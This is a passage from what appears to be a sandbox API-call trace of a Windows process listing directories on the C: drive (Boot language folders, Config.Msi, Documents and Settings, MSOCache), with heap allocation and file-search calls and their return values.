dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0035.330] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.330] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.330] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.330] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.330] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.330] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.330] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0035.330] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.330] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.330] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.330] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.330] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.331] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.331] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0035.331] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.331] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.331] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.331] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.331] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.331] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.331] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0035.331] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.331] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.331] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.331] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.331] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.331] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.331] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0035.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.332] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.332] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.332] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.332] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.332] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.332] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0035.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.332] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.332] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.332] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.332] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.332] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.332] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0035.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.333] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.335] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.335] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.335] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.335] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.335] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0035.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.335] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.335] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.335] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.335] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.335] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.335] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0035.335] FindClose (in: hFindFile=0x6f1ff0 | out: hFindFile=0x6f1ff0) returned 1 [0035.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x38f06c8 | out: hHeap=0x600000) returned 1 [0035.336] FindNextFileW (in: hFindFile=0x6f0fa8, lpFindFileData=0x33dfd00 | out: lpFindFileData=0x33dfd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0035.336] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38f06c8 [0035.336] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f1ff0 [0035.336] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.336] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0035.336] FindClose (in: hFindFile=0x6f1ff0 | out: hFindFile=0x6f1ff0) returned 1 [0035.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x38f06c8 | out: hHeap=0x600000) returned 1 [0035.336] FindNextFileW (in: hFindFile=0x6f0fa8, lpFindFileData=0x33dfd00 | out: lpFindFileData=0x33dfd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0035.336] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38f06c8 [0035.336] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="\xdf70\x64\x16")) returned 0xffffffff [0035.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x38f06c8 | out: hHeap=0x600000) returned 1 [0035.336] FindNextFileW (in: hFindFile=0x6f0fa8, lpFindFileData=0x33dfd00 | out: lpFindFileData=0x33dfd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0035.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38f06c8 [0035.337] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f1ff0 [0035.337] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.337] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x2011, 